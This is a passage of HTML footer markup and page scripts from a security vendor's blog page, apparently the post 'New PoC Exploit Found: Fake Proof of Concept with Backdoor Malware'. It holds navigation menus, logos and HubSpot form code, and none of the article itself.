              <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=365&amp;height=117&amp;name=Group%20118.png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=183&amp;height=59&amp;name=Group%20118.png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=365&amp;height=117&amp;name=Group%20118.png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=548&amp;height=176&amp;name=Group%20118.png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=730&amp;height=234&amp;name=Group%20118.png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=913&amp;height=293&amp;name=Group%20118.png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=1095&amp;height=351&amp;name=Group%20118.png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
              
              
              
              
              
              
              <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=365&amp;height=117&amp;name=Group%20119.png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=183&amp;height=59&amp;name=Group%20119.png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=365&amp;height=117&amp;name=Group%20119.png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=548&amp;height=176&amp;name=Group%20119.png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=730&amp;height=234&amp;name=Group%20119.png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=913&amp;height=293&amp;name=Group%20119.png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=1095&amp;height=351&amp;name=Group%20119.png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
              
              
              
              
              
              
              <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=365&amp;height=117&amp;name=Group%20120.png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=183&amp;height=59&amp;name=Group%20120.png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=365&amp;height=117&amp;name=Group%20120.png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=548&amp;height=176&amp;name=Group%20120.png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=730&amp;height=234&amp;name=Group%20120.png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=913&amp;height=293&amp;name=Group%20120.png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=1095&amp;height=351&amp;name=Group%20120.png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
              
              
              
              
              
              
              <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=365&amp;height=117&amp;name=Group%20121-1.png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=183&amp;height=59&amp;name=Group%20121-1.png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=365&amp;height=117&amp;name=Group%20121-1.png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=548&amp;height=176&amp;name=Group%20121-1.png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=730&amp;height=234&amp;name=Group%20121-1.png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=913&amp;height=293&amp;name=Group%20121-1.png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=1095&amp;height=351&amp;name=Group%20121-1.png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
              
              
            </div>
          </div>



          <!-- End Social Media -->
          <!-- Start Footer Links -->
          <div class="Footer_Links">
            
            <div class="TwoMenuLinks Desktop">
              <div class="FServices_Links">
                
                <h5>Platform</h5>
                
                <div class="w100">
                  <div class="Attack_Surfaces">
                    
                    <h6>CNAPP Hybrid Cloud Security</h6>
                    <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp" role="menuitem" target="_self">Platform</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/pricing" role="menuitem" target="_self">Cloud Security Pricing</a></li>
 </ul>
</div></span>
                    
                    <h6>Solutions</h6>
                    <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp/cwpp" role="menuitem" target="_self">Workload Protection</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp/cspm" role="menuitem" target="_self">Posture Management</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/use-cases/vulnerability-scanning" role="menuitem" target="_self">Vulnerability Management</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/attack-surfaces/containers-kubernetes" role="menuitem" target="_self">Container &amp; Kubernetes Security</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/solutions/software-supply-chain-security-protect-workloads-against-emerging-threats" role="menuitem" target="_self">Software Supply Chain</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp/file-integrity-monitoring-enhanced-security" role="menuitem" target="_self">File Integrity Monitoring</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/use-cases/cloud-threat-prevention-defend-against-cloud-threats" role="menuitem" target="_self">Detection &amp; Response</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/cnapp/hybrid-cloud-asset-management" role="menuitem" target="_self">Asset Management</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/products/use-cases/strengthening-security-integrated-compliance-platform" role="menuitem" target="_self">Compliance &amp; Risk</a></li>
 </ul>
</div></span>
                    
                  </div>
                </div>
              </div>
            </div>
            
            <div class="TwoMenuLinks Desktop">
              <div class="FServices_Links">
                
                <h5>Environments</h5>
                
                <div class="w100">
                  <div class="Attack_Surfaces">
                    
                    <h6>By Platform</h6>
                    <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/partners/aws" role="menuitem" target="_self">AWS</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/partners/azure" role="menuitem" target="_self">Microsoft Azure</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/partners/google-cloud-security" role="menuitem" target="_self">Google Cloud</a></li>
 </ul>
</div></span>
                    
                    <h6>Integrations</h6>
                    <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/tools-and-integrations" role="menuitem" target="_self">Tools and Integrations</a></li>
 </ul>
</div></span>
                    
                  </div>
                </div>
              </div>
            </div>
            
            <div class="TwoMenuLinks Desktop">
              <div class="FServices_Links">
                
                <h5>Why Uptycs</h5>
                
                <div class="w100">
                  <div class="Attack_Surfaces">
                    
                    <h6>Why Choose Uptycs</h6>
                    <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/about" role="menuitem" target="_self"> About Us</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=customer_stories" role="menuitem" target="_self">Case Studies</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/reviews" role="menuitem" target="_self">Reviews</a></li>
 </ul>
</div></span>
                    
                    <h6>Compare Uptycs</h6>
                    <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/compare-us/aqua" role="menuitem" target="_self">Aqua</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/compare-us/lacework" role="menuitem" target="_self"> Lacework</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/compare-us/sysdig" role="menuitem" target="_self"> Sysdig</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/compare-us/crowdstrike" role="menuitem" target="_self"> CrowdStrike</a></li>
 </ul>
</div></span>
                    
                  </div>
                </div>
              </div>
            </div>
            
            <div class="TwoMenuLinks Desktop">
              <div class="FServices_Links">
                
                <h5>Resources</h5>
                
                <div class="w100">
                  <div class="Attack_Surfaces">
                    
                    <h6>Resources</h6>
                    <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=analyst_reports" role="menuitem" target="_self">Analyst Reports</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=product_briefs" role="menuitem" target="_self">Product Briefs</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/blog" role="menuitem" target="_self">Blog</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/video-hub" role="menuitem" target="_self">Video Hub</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/blog/threat-research-report-team" role="menuitem" target="_self">Threat Research Report Team</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=guides" role="menuitem" target="_self">Whitepapers</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=guides" role="menuitem" target="_self">E-books</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=guides" role="menuitem" target="_self">Guides</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/resources?filter=threat_intelligence" role="menuitem" target="_self">Threat Quarterly Reports</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/master-glossary" role="menuitem" target="_self">Glossary</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/events" role="menuitem" target="_self">Webinars and Events</a></li>
 </ul>
</div></span>
                    
                    <h6>Company</h6>
                    <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/about/career" role="menuitem" target="_self">Careers</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/press-news-release" role="menuitem" target="_self">News</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/cybersecurity-standup" role="menuitem" target="_self">CSU</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/services-support" role="menuitem" target="_self">Support</a></li>
 </ul>
</div></span>
                    
                  </div>
                </div>
              </div>
            </div>
            
            <div class="TwoMenuLinks Desktop">
              <div class="FServices_Links">
                
                <h5>Partners</h5>
                
                <div class="w100">
                  <div class="Attack_Surfaces">
                    
                    <h6>Partner Program</h6>
                    <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/partners" role="menuitem" target="_self">Upward Partner Program</a></li>
 </ul>
</div></span>
                    
                  </div>
                </div>
              </div>
            </div>
            

          </div>
          <!-- End Footer Links -->
        </div>

        <div class="social social-mobile">
          <div class="Footer_SocialMedia">
            
            <h5>Follow Us</h5>
            
            <ul>
              
              <li>
                
                
                <a href="https://www.linkedin.com/company/uptycs/" target="_blank" rel="noopener">
                  
                  <svg width="12" height="12" viewbox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M2.26897 2.56951C3.07306 2.56951 3.57649 2.03811 3.56949 1.37387C3.5625 0.695637 3.07306 0.178223 2.28295 0.178223C1.49984 0.178223 0.982422 0.695637 0.982422 1.37387C0.982422 2.03811 1.47886 2.56951 2.25498 2.56951H2.26897ZM6.99562 10.4426V6.57598C6.99562 6.36621 7.01659 6.16344 7.07253 6.00962C7.24034 5.59709 7.61791 5.17057 8.25419 5.17057C9.08625 5.17057 9.42187 5.80685 9.42187 6.7368V10.4426H11.7223V6.4711C11.7223 4.3455 10.5895 3.35263 9.07226 3.35263C7.87377 3.35263 7.32365 3.99452 7.01607 4.46663L6.99516 4.49907L6.99562 3.51344H4.69522C4.69522 3.51344 4.72319 4.16371 4.69522 10.4426H6.99562ZM3.42266 10.4426V3.51344H1.11527V10.4426H3.42266Z" fill="#962DE9" /></svg>
                  
                </a>
              </li>
              
              <li>
                
                
                <a href="https://twitter.com/uptycs?lang=en" target="_blank" rel="noopener">
                  
                  <svg width="14" height="12" viewbox="0 0 14 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M4.27091 10.3906C6.42771 10.3906 8.15746 9.66525 9.46017 8.21458C10.7629 6.76392 11.4142 5.14782 11.4142 3.3663V3.0609C11.9318 2.68763 12.3459 2.26346 12.6565 1.78839C12.2252 1.99199 11.742 2.11924 11.2072 2.17014C11.7766 1.84777 12.1475 1.38966 12.3201 0.795828C11.7679 1.11819 11.233 1.3218 10.7154 1.40663C10.2151 0.880663 9.61115 0.617676 8.90372 0.617676C8.19629 0.617676 7.60101 0.855212 7.11789 1.33028C6.63476 1.80535 6.3932 2.39071 6.3932 3.08635C6.3932 3.34085 6.41046 3.52749 6.44497 3.64626C4.33993 3.54446 2.62311 2.68763 1.29452 1.07578C1.07022 1.46602 0.958063 1.87322 0.958063 2.29739C0.958063 3.19663 1.32903 3.88379 2.07097 4.35886C1.69137 4.35886 1.31178 4.25706 0.93218 4.05346V4.07891C0.93218 4.67275 1.12629 5.19448 1.51452 5.6441C1.90274 6.09373 2.38155 6.37792 2.95095 6.49669C2.67488 6.56456 2.45057 6.59849 2.27802 6.59849C2.1745 6.59849 2.01921 6.58152 1.81216 6.54759C1.96745 7.03963 2.26077 7.44259 2.69213 7.75648C3.12349 8.07036 3.60662 8.23579 4.1415 8.25276C3.22702 8.96537 2.19175 9.32167 1.03571 9.32167C0.914926 9.32167 0.716501 9.3047 0.44043 9.27077C1.61373 10.0173 2.89056 10.3906 4.27091 10.3906Z" fill="#962DE9" /></svg>
                  
                </a>
              </li>
              
              <li>
                
                
                <a href="https://www.facebook.com/uptycs/" target="_blank" rel="noopener">
                  
                  <svg width="9" height="16" viewbox="0 0 9 16" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M5.9387 14.2018V8.09205H7.98331L8.29724 5.70935H5.9387V4.18797C5.9387 3.50375 6.12384 3.02883 7.11395 3.02883H8.37774V0.903724C8.1604 0.871526 7.41178 0.807129 6.54242 0.807129C4.7232 0.807129 3.47551 1.91798 3.47551 3.95453V5.70935H1.42285V8.09205H3.47551V14.2018H5.9387Z" fill="#962DE9" /></svg>
                  
                </a>
              </li>
              
              <li>
                
                
                <a href="https://www.youtube.com/@uptycs" target="_blank" rel="noopener">
                  
                  <svg width="15" height="12" viewbox="0 0 15 12" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M13.1182 0.984606C13.705 1.14249 14.1672 1.60764 14.324 2.19829C14.609 3.26887 14.609 5.50253 14.609 5.50253C14.609 5.50253 14.609 7.73618 14.324 8.80677C14.1672 9.39741 13.705 9.86256 13.1182 10.0205C12.0545 10.3073 7.7894 10.3073 7.7894 10.3073C7.7894 10.3073 3.52426 10.3073 2.4606 10.0205C1.87376 9.86256 1.41159 9.39741 1.25474 8.80677C0.969727 7.73618 0.969727 5.50253 0.969727 5.50253C0.969727 5.50253 0.969727 3.26887 1.25474 2.19829C1.41159 1.60764 1.87376 1.14247 2.4606 0.984606C3.52426 0.697754 7.7894 0.697754 7.7894 0.697754C7.7894 0.697754 12.0545 0.697754 13.1182 0.984606ZM9.95894 5.50266L6.39412 7.53061V3.47461L9.95894 5.50266Z" fill="#962DE9" /></svg>
                  
                </a>
              </li>
              
            </ul>
          </div>
        </div>


        <div class="footer_pre_copy mobile_parter">
          
          
          
          
          
          <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=365&amp;height=117&amp;name=Group%20117%20(2).png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=183&amp;height=59&amp;name=Group%20117%20(2).png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=365&amp;height=117&amp;name=Group%20117%20(2).png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=548&amp;height=176&amp;name=Group%20117%20(2).png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=730&amp;height=234&amp;name=Group%20117%20(2).png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=913&amp;height=293&amp;name=Group%20117%20(2).png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20117%20(2).png?width=1095&amp;height=351&amp;name=Group%20117%20(2).png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
          
          
          
          
          
          
          <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=365&amp;height=117&amp;name=Group%20118.png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=183&amp;height=59&amp;name=Group%20118.png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=365&amp;height=117&amp;name=Group%20118.png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=548&amp;height=176&amp;name=Group%20118.png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=730&amp;height=234&amp;name=Group%20118.png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=913&amp;height=293&amp;name=Group%20118.png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20118.png?width=1095&amp;height=351&amp;name=Group%20118.png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
          
          
          
          
          
          
          <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=365&amp;height=117&amp;name=Group%20119.png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=183&amp;height=59&amp;name=Group%20119.png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=365&amp;height=117&amp;name=Group%20119.png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=548&amp;height=176&amp;name=Group%20119.png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=730&amp;height=234&amp;name=Group%20119.png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=913&amp;height=293&amp;name=Group%20119.png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20119.png?width=1095&amp;height=351&amp;name=Group%20119.png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
          
          
          
          
          
          
          <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=365&amp;height=117&amp;name=Group%20120.png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=183&amp;height=59&amp;name=Group%20120.png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=365&amp;height=117&amp;name=Group%20120.png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=548&amp;height=176&amp;name=Group%20120.png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=730&amp;height=234&amp;name=Group%20120.png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=913&amp;height=293&amp;name=Group%20120.png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20120.png?width=1095&amp;height=351&amp;name=Group%20120.png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
          
          
          
          
          
          
          <img class="footer_icons_new" src="https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=365&amp;height=117&amp;name=Group%20121-1.png" alt="partner-image" loading="" width="365" height="117" srcset="https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=183&amp;height=59&amp;name=Group%20121-1.png 183w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=365&amp;height=117&amp;name=Group%20121-1.png 365w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=548&amp;height=176&amp;name=Group%20121-1.png 548w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=730&amp;height=234&amp;name=Group%20121-1.png 730w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=913&amp;height=293&amp;name=Group%20121-1.png 913w, https://www.uptycs.com/hs-fs/hubfs/Group%20121-1.png?width=1095&amp;height=351&amp;name=Group%20121-1.png 1095w" sizes="(max-width: 365px) 100vw, 365px"> 
          
          
        </div>

      </div>
      <!-- End Footer Link and Social media  -->
      <!-- Start Footer Bottom -->
      <div class="be-ix-link-block"></div>
      <div class="footerBottom">
        
        <div class="Copyright w50">
          © 2024 Uptycs. All rights reserved.
        </div>
        
        
        <div class="BottomRight_Links w50">
          <span id="hs_cos_wrapper_widget_1722594192479_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_simple_menu" style="" data-hs-cos-general-type="widget" data-hs-cos-type="simple_menu"><div id="hs_menu_wrapper_widget_1722594192479_" class="hs-menu-wrapper active-branch flyouts hs-menu-flow-horizontal" role="navigation" data-sitemap-name="" data-menu-id="" aria-label="Navigation Menu">
 <ul role="menu">
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/privacy-policy" role="menuitem" target="_self">Privacy Policy</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/about/security" role="menuitem" target="_self">Security Practices</a></li>
  <li class="hs-menu-item hs-menu-depth-1" role="none"><a href="https://www.uptycs.com/contact-us" role="menuitem" target="_self">Contact Us</a></li>
 </ul>
</div></span>
        </div>
        
      </div>
      <!-- End Footer Bottom -->
    </div>
  </div>
</div>




</div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div>
</div>
</div>
 
  
  
  
</footer></div>
      
    </div> 

    


    
<!-- HubSpot performance collection script -->
<script defer src="/hs/hsstatic/content-cwv-embed/static-1.1293/embed.js"></script>
<script src="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/148557950338/1725517699386/Uptycs_Theme_2023/js/aos/aos.min.js"></script>
<script src="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/105237812090/1725517698595/Uptycs_Theme_2023/js/main.min.js"></script>
<script>
var hsVars = hsVars || {}; hsVars['language'] = 'en';
</script>

<script src="/hs/hsstatic/cos-i18n/static-1.53/bundles/project.js"></script>
 
<script>
  window.setTimeout(function(){

     if (window.innerWidth > 800) { 
      $('.UT_announcement_bar').addClass('show-pop');
      $('header.header.menu_header').addClass('show-pop');
      $('header.header.header-new').addClass('show-pop');

      $('body').addClass('body-show-pop');
      var top_bar_height = $('.UT_announcement_bar').innerHeight();
      var header_height = $('header.header.menu_header').innerHeight();
      var total_height = top_bar_height + header_height;

      $('body.body-show-pop').css('margin-top', total_height +'px');
      $('body.body-show-pop header.header.menu_header').css('margin-top', top_bar_height +'px');
      $('body.body-show-pop header.header.header-new').css('margin-top', top_bar_height +'px'); 
       } 
  }, 3000);  
</script>

 
<script>
  $('.UT_announcement_bar .close').on('click', function() {
    $('body').css('margin-top', 0);
    $('header.header.menu_header.show-pop').css('margin-top', 0);
    $('header.header.header-new.show-pop').css('margin-top', 0);

    $('.UT_announcement_bar').removeClass('show-pop');
    $('header.header.menu_header').removeClass('show-pop');
    $('header.header.header-new').removeClass('show-pop');
    $('body').removeClass('body-show-pop');
  }); 
</script>

<script src="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/177030409118/1730182624029/module_177030409118_mega-menu-new.min.js"></script>
<script src="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/170041160857/1725516578400/module_170041160857_sidebar-popup-cta.min.js"></script>

    <!--[if lte IE 8]>
    <script charset="utf-8" src="https://js.hsforms.net/forms/v2-legacy.js"></script>
    <![endif]-->

<script data-hs-allowed="true" src="/_hcms/forms/v2.js"></script>

    <script data-hs-allowed="true">
        var options = {
            portalId: '2617658',
            formId: '7ff3e6de-0224-41fe-ad44-9e56a56bb368',
            formInstanceId: '9707',
            
            pageId: '124199424638',
            
            region: 'na1',
            
            
            
            
            pageName: "New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware",
            
            
            
            inlineMessage: "Thanks for submitting the form.",
            
            
            rawInlineMessage: "Thanks for submitting the form.",
            
            
            hsFormKey: "7821db9b1c8702cb2c591b501a154537",
            
            
            css: '',
            target: '#hs_form_target_form_770361775',
            
            
            
            
            
            
            
            contentType: "blog-post",
            
            
            
            formsBaseUrl: '/_hcms/forms/',
            
            
            
            formData: {
                cssClass: 'hs-form stacked hs-custom-form'
            }
        };

        options.getExtraMetaDataBeforeSubmit = function() {
            var metadata = {};
            

            if (hbspt.targetedContentMetadata) {
                var count = hbspt.targetedContentMetadata.length;
                var targetedContentData = [];
                for (var i = 0; i < count; i++) {
                    var tc = hbspt.targetedContentMetadata[i];
                     if ( tc.length !== 3) {
                        continue;
                     }
                     targetedContentData.push({
                        definitionId: tc[0],
                        criterionId: tc[1],
                        smartTypeId: tc[2]
                     });
                }
                metadata["targetedContentMetadata"] = JSON.stringify(targetedContentData);
            }

            return metadata;
        };

        hbspt.forms.create(options);
    </script>

<script src="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/169940550668/1733491050381/module_169940550668_table-of-content.min.js"></script>

<script>
$(".blog--post-content-section p").filter(function(){
    return $.trim(this.innerHTML) === "&nbsp;"
}).remove();
</script>


